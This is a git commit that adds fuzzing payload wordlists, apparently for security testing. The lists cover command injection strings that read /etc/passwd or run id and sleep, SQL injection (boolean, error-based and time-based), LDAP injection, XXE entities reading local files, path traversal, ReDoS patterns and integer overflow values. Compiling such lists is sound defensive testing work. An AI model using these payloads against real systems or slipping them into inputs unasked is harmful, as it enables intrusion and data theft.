Adding Payloads to new repo
Change-Id: I113954eced5c0675a5d462260cbf3875182b1c2f
This commit is contained in:
parent
9011e09ae3
commit
ca14b0db1b
35
command_injection.txt
Normal file
35
command_injection.txt
Normal file
@ -0,0 +1,35 @@
|
||||
%3B%20cat%20/etc/passwd
|
||||
%7C%20cat%20%2Fetc%2Fpasswd
|
||||
%26%26%20id
|
||||
%60id%60
|
||||
%7C%7C%20sleep%2010
|
||||
%26%26%20sleep%2010
|
||||
%7C%20type%20C%3A%5Cboot.ini
|
||||
%7C%7C%20type%20C%3A%5Cboot.ini
|
||||
%26%26%20%20ping%20127.0.0.1%20-n%2010
|
||||
%3B%20%20ping%20127.0.0.1%20-n%2010
|
||||
&& id
|
||||
`id`
|
||||
| id
|
||||
|| id
|
||||
; id
|
||||
| cat /etc/passwd
|
||||
&& cat /etc/passwd
|
||||
`cat /etc/passwd`
|
||||
; cat /etc/passwd
|
||||
|| cat /etc/passwd
|
||||
&& sleep 10
|
||||
|| sleep 10
|
||||
| sleep 10
|
||||
; sleep 10
|
||||
`sleep 10`
|
||||
| type C:\boot.ini
|
||||
|| type C:\boot.ini
|
||||
; type C:\boot.ini
|
||||
&& type C:\boot.ini
|
||||
`type C:\boot.ini`
|
||||
| ping 127.0.0.1 -n 10
|
||||
; ping 127.0.0.1 -n 10
|
||||
|| ping 127.0.0.1 -n 10
|
||||
&& ping 127.0.0.1 -n 10
|
||||
`ping 127.0.0.1 -n 10`
|
17
integer-overflow.txt
Normal file
17
integer-overflow.txt
Normal file
@ -0,0 +1,17 @@
|
||||
-1
|
||||
-0
|
||||
-0xff
|
||||
999999999999999
|
||||
-999999999999999
|
||||
-0.999999999999999
|
||||
9 ** 100
|
||||
\x00
|
||||
0
|
||||
0x3fffffff
|
||||
0x7ffffffe
|
||||
0x7fffffff
|
||||
0x80000000
|
||||
0xfffffffe
|
||||
0xffffffff
|
||||
0x10000
|
||||
0x100000
|
25
ldap.txt
Normal file
25
ldap.txt
Normal file
@ -0,0 +1,25 @@
|
||||
!
|
||||
%21
|
||||
%26
|
||||
%28
|
||||
%29
|
||||
%2A%28%7C%28mail%3D%2A%29%29
|
||||
%2A%28%7C%28objectclass%3D%2A%29%29
|
||||
%2A%7C
|
||||
%7C
|
||||
&
|
||||
(
|
||||
)
|
||||
*(|(mail=*))
|
||||
*(|(objectclass=*))
|
||||
*/*
|
||||
*|
|
||||
/
|
||||
//
|
||||
//*
|
||||
@*
|
||||
x' or name()='username' or 'x'='y
|
||||
|
|
||||
*()|&'
|
||||
admin*
|
||||
admin*)((|userpassword=*)
|
6
redos.txt
Normal file
6
redos.txt
Normal file
@ -0,0 +1,6 @@
|
||||
(a+)+
|
||||
^(([a-z])+.)+[A-Z]([a-z])+$
|
||||
aaaaaaaaaaaaaaaaaaaaaaaaaab
|
||||
(([\-.]|[_]+)?([a-zA-Z0-9]+))*
|
||||
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
|
||||
1111111111111111111111111111111112
|
30
sql-injection.txt
Normal file
30
sql-injection.txt
Normal file
@ -0,0 +1,30 @@
|
||||
AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
|
||||
AND EXTRACTVALUE(1,CONCAT('','x',(SELECT (ELT(1=1,1))),'x'))
|
||||
AND UPDATEXML(1,CONCAT('.','x',(SELECT (ELT(1=1,1))),'x'),2)
|
||||
AND ROW(1,2)>(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM (SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6)a GROUP BY x)
|
||||
AND 1=CAST('x'||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'x' AS NUMERIC)
|
||||
PROCEDURE ANALYSE(EXTRACTVALUE(1,CONCAT('','x',(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END)),'x')),1)
|
||||
(SELECT 1 FROM(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
|
||||
(EXTRACTVALUE(1,CONCAT('','x',(SELECT (ELT(1=1,1))),'x')))
|
||||
(CAST('x'||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'x' AS NUMERIC))
|
||||
,(SELECT 1 FROM(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
|
||||
,ROW(1,2)>(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM (SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6)a GROUP BY x)
|
||||
,(CAST('x'||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'x' AS NUMERIC))
|
||||
AND (SELECT * FROM (SELECT(SLEEP(10)))x)
|
||||
AND SLEEP(10)
|
||||
RLIKE (SELECT * FROM (SELECT(SLEEP(10)))x)
|
||||
AND ELT(1=1,SLEEP(10))
|
||||
AND 1=(SELECT 1 FROM PG_SLEEP(10))
|
||||
(SELECT (CASE WHEN (1=1) THEN SLEEP(10) ELSE 1*(SELECT 1 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
|
||||
(SELECT * FROM (SELECT(SLEEP(10)))x)
|
||||
(SELECT 1 FROM PG_SLEEP(10))
|
||||
,(SELECT (CASE WHEN (1=1) THEN SLEEP(10) ELSE 1*(SELECT 1 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
|
||||
,(SELECT (CASE WHEN (1=1) THEN (SELECT 1 FROM PG_SLEEP(10)) ELSE 1/(SELECT 0) END))
|
||||
a'b"c'd"
|
||||
' or 'a'='a
|
||||
" or "a"="a
|
||||
') or ('a'='a
|
||||
'/**/OR/**/1/**/=/**/1
|
||||
' or 1=1 --
|
||||
' union (select @@version) --
|
||||
; OR '1'='1'
|
12
string_validation.txt
Normal file
12
string_validation.txt
Normal file
@ -0,0 +1,12 @@
|
||||
\x00
|
||||
\\00
|
||||
\x80\xff
|
||||
%uf%80%ff%xx%uffff
|
||||
\u1111\uffff
|
||||
\u2018
|
||||
\u201c
|
||||
%2e%2e%2f
|
||||
..%c0%af
|
||||
%5c
|
||||
..%255c..%255c..%255c
|
||||
*!@#$^&()[]{}|.,"\'/''"
|
4
xml-external.txt
Normal file
4
xml-external.txt
Normal file
@ -0,0 +1,4 @@
|
||||
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
|
||||
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]>
|
||||
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "http://www.openstack.org" >]>
|
||||
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "http://www.openstackorg" >]>
|
Loading…
Reference in New Issue
Block a user